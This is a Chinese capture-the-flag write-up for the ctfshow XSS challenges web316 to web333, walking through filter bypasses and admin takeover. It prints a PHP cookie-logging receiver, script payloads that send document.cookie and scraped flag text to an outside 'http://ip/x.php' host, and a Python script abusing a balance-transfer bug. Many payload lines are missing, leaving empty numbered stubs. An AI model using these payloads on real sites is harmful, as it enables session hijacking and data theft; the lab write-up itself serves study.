ctfshow XSS web316~web333

web316

反射性 XSS

题目提示我们要以 admin 获取

奇葩的是用网上的 xss 平台，获取的 cookie 全是自己的。

可以在自己的服务器上，创建一个接收 cookie 的 PHP 文件：

$cookie = $_GET['cookie'];
$time = date('Y-m-d h:i:s', time());
$log = fopen("cookie.txt", "a");
fwrite($log,$time.':    '. $cookie . "\n");
fclose($log);
?>
1
2
3
4
5
6
7

构造 xss 语句：

<script>location.href="http://ip/x.php?cookie="+document.cookie</script>
1

web317

过滤了 script，标签可以用 img 标签。

1

web318-319

img 标签也被过滤了，可以用 body 标签。

1

web320-326(反射型)

上面的 payload 用不了，测试一番发现过滤了空格，可以用 / 绕过。

1

web327(存储型xss)

收件人 admin，

1

web328

在用户管理处显示要 admin 权限，且显示会显示所有的用户名密码，说明它会存储在某个地方，那么这个存的用户名和密码处会不会产生 xss 呢？

答案是会产生 xss：
上面的那个 body 标签没用了，我们可以使用

• 1

更改phpsessid 访问用户管理的时候，会跳转，我们可以抓包查看。

web329

继续用上面的payload 获得了 admin 的 cookie，但是访问的时候却还显示不是 admin，并且 cookie 会变化，也就是说这个 cookie 在使用后就没用了。

看了 bilibili 里的视频后，学到一种姿势，因为它会把我们的 xss 代码即使是在用户管理里也会执行，所以我们可以这届把 flag 发送到我们的服务器里。

<script>
$('.laytable-cell-1-0-1').each(function(index,value){
	if(value.innerText.indexOf('ctfshow{')>-1)
	{location.href='http://ip/x.php?cookie='+value.innerText}
});
</script>
1
2
3
4
5
6

payload:

1

web330

有修改密码的地方，那我们不就可以直接修改 admin 的密码了吗。

路径也知道了。

payload：

1

最后登录抓包得到 flag

web331

和上一题不同的是，这次的是 post 请求，用 ajax 异步请求。

1

最后注册，登录 admin 拿到 flag。

web332

经测试自己转账给自己，余额不降反升，那么写个脚本跑一下呗。

import requests
url = 'http://ef46a706-80af-4a5c-8168-42d0aa88b161.challenge.ctf.show/api/amount.php'
money = 4
for i in range(100):
    data = {
        'u':'111',
        'a':money
    }
    money += 4
    cookie = {
        'PHPSESSID':'p8fk0f6lht46n8h5n96u5m7fjs'
    }
    req = requests.post(url,data=data,cookies=cookie)
    print(req.text)
1
2
3
4
5
6
7
8
9
10
11
12
13
14

web333

同上

预期解释通过 ajax 异步提交 post 数据，让 admin 转账给我们。

具体步骤是，先注册一个收款人用户，再注册一个 xss 用户，之后等会，admin 就转完了。

1